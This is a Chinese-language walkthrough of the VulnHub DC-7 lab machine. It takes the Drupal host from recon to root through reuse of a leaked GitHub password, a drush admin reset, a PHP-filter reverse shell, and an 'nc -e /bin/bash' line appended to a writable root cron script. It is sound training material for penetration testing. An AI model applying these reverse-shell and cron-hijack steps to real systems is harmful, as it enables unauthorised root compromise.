vulnhub： DC 7

信息收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-methods: 
|_  Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:40:76:C6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.008 days (since Wed Sep  2 21:17:23 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开放22和80端口，http使用了Drupal搭建，访问Web页面：

 

提示不建议进行爆破，建议跳出靶机去搜寻信息，在搜索引擎搜索@DC7USER：

github、twitter都能收到相关账号，访问twitter账号其简介内容如下：

This is a Twitter Account for the DC-7 challenge. There isn't really a lot here.

访问github，在config.php中拿到数据库账号密码：

<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>

使用该账号密码ssh登录成功：

[C:\~]$ ssh 192.168.76.135


Connecting to 192.168.76.135:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
/usr/bin/xauth:  file /home/dc7user/.Xauthority does not exist
dc7user@dc-7:~$ whoami
dc7user
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

在当前用户home目录下有mbox文件，从其中可以看到：

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
    (envelope-from <root@dc-7>)
    id 1i3LCo-0000Eb-02
    for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

定时任务会以root权限自动执行 /opt/scripts/backups.sh，这是一个自动备份脚本会自动对web站点文件和数据库进行备份：

dc7user@dc-7:~/backups$ more /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

其文件权限为：

dc7user@dc-7:~/backups$ ls -l /opt/scripts/backups.sh 
-rwxrwxr-x 1 root www-data 520 Aug 29  2019 /opt/scripts/backups.sh

因此可以考虑从Web入手拿到www-data权限，修改备份脚本，通过创建root权限用户，反弹shell等各种方式拿到root权限。

重置admin的用户密码（https://www.isfirst.net/drupal/drupal-reset-password）：

dc7user@dc-7:/var/www/html$ drush user-login admin
default does not appear to be a resolvable hostname or IP, not starting browser. You may need to use the --uri option in your command or site alias to indicate the correct URL of this site.                                         [warning]
http://default/user/reset/1/1599091076/Z6q99HO2oKbTxsQ-5YwKlq7x58UaJ2FU_uoqkUha12M/login
dc7user@dc-7:/var/www/html$ 

登录得到一次性登录url，登录Web设置admin密码为123456：

 下载php扩展上传（https://www.drupal.org/project/php）安装php filter扩展：

新建content，选择插入源码，文本格式选择php code:

保存后访问对应的页面：

反弹shell连接kali：

root@kali:/opt/test# nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.76.129] from (UNKNOWN) [192.168.76.135] 58752
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-7:/var/www/html$ cd /opt/scripts
cd /opt/scripts
www-data@dc-7:/opt/scripts$ cat backups.sh
cat backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

 向backups.sh中追写命令反弹shell:

www-data@dc-7:/opt/scripts$ echo "nc -e /bin/bash 192.168.76.129 7777" >> backups.sh
<"nc -e /bin/bash 192.168.76.129 7777" >> backups.sh
www-data@dc-7:/opt/scripts$ more backups.sh
more backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
nc -e /bin/bash 192.168.76.129 7777

 

在kali监听，拿到root权限：

root@kali:/home/yurang# nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.76.129] from (UNKNOWN) [192.168.76.135] 38054
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# cd /root
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@dc-7:~#